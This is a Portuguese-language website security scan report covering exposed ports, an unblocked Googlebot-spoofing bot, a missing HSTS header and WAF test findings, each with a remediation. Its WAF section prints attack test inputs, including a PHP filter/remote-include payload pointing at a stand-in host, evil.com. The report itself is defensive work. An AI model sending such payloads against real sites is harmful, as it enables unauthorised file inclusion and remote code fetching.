Manual de segurança e privacidade
1 - A porta 80/tcp: Porta usada pelo serviço cloudflare.
DescriçãoCertificar que a porta 80/tcp seja usada apenas para oferecer suporte à emissão de certificados e redirecionamento para um protocolo seguro (ssl)
2 - A porta 8080/tcp.
Os invasores podem explorar deficiências como credenciais fracas, ausência de autenticação de dois fatores ou até mesmo vulnerabilidades no aplicativo.
Solução:Considere fechar a porta 8080/tcp com um firewall para proteger os recursos internos do servidor.
Software de bot imita o mecanismo de pesquisa: com user-agent Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatível; Googlebot/2.1; +http://www.google.com/bot.html) não foi bloqueado pelo site (código de resposta 403 esperado, mas 200 encontrado).
Fator de risco:Bots maliciosos podem prejudicar e/ou sobrecarregar o site.
Solução:Bloquear bots maliciosos.
A seguir possíveis problemas na segurança do site relacionados às ameaças automatizadas emitidas por bots.
Bots Maliciosos que exploraram vulnerabilidades no site:
Cabeçalhos relacionados à falha de segurança HTTP.
O cabeçalho HTTP Strict-Transport-Security informa ao navegador que ele nunca deve carregar um site usando HTTP e deve converter automaticamente todas as tentativas de acessar o site usando solicitações HTTP para HTTPS.
Risco:
Os usuários do site não estão protegidos contra certas categorias de ataques MITM.
Solução:
Adicione o cabeçalho Strict-Transport-Security na configuração do seu servidor web.
Exemplo: payload em uma URL - &password1=1&enter=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C+%D0%B7%D0% B0%D0%BF%D1%80%D0%BE%D1%81
Fator de risco:
Um WAF mal configurado é ainda pior do que um ausente, pois cria uma falsa sensação de segurança.
Solução:
Configure WAF com as melhores práticas, instale as atualizações mais recentes e atualize os conjuntos de regras do WAF para a versão mais recente.
Exemplo: de carga em um ARGS: page=php://filter/read=string.rot13/resource=http://evil.com/index.php
Fator de risco:
Um WAF mal configurado é ainda pior do que um ausente, pois cria uma falsa sensação de segurança.
Solução:
Configure WAF com as melhores práticas, instale as atualizações mais recentes e atualize os conjuntos de regras do WAF para a versão mais recente.